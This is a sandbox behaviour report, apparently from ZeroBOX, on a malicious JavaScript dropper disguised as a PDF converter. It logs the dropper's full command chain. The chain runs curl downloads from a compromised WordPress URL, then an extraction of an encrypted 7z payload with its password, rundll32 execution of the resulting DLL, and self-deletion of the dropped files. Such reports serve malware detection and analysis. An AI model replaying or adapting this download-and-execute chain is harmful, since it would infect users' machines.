Summary | ZeroBOX

convert-pdf-359.js

Generic Malware UPX Malicious Library Malicious Packer PE File OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 14, 2023, 1:36 p.m. Sept. 14, 2023, 1:38 p.m.
Size 43.7KB
Type ASCII text
MD5 5e554b41294605c0d114677cb3aec892
SHA256 5709a20da24e5d19defff1b35335a09d209163a9609d85fb944fa3c6025ac156
CRC32 0B9BFFD4
ssdeep 768:yP+RrZ8imUmDvHwL5NdEblS9z1BrnUdDeNAU4eF2GRrszw/FJXlDdH:yP+RreDvHqnUdKNAW
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
49.12.202.237 Active Moloch
89.163.140.12 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3
192.168.56.101:49169
89.163.140.12:443
None None None
TLS 1.3
192.168.56.101:49173
49.12.202.237:443
None None None

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1736
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\illo.g.bat
cmdline cmd.exe /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
file C:\Users\test22\AppData\Local\Temp\enim.q
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: curl
parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
filepath: curl
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
file C:\Users\test22\AppData\Local\Temp\laudantium.a
file C:\Users\test22\AppData\Local\Temp\enim.q
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process wscript.exe martian_process curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process wscript.exe martian_process cmd.exe /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
parent_process wscript.exe martian_process cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
file C:\Windows\System32\cmd.exe
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe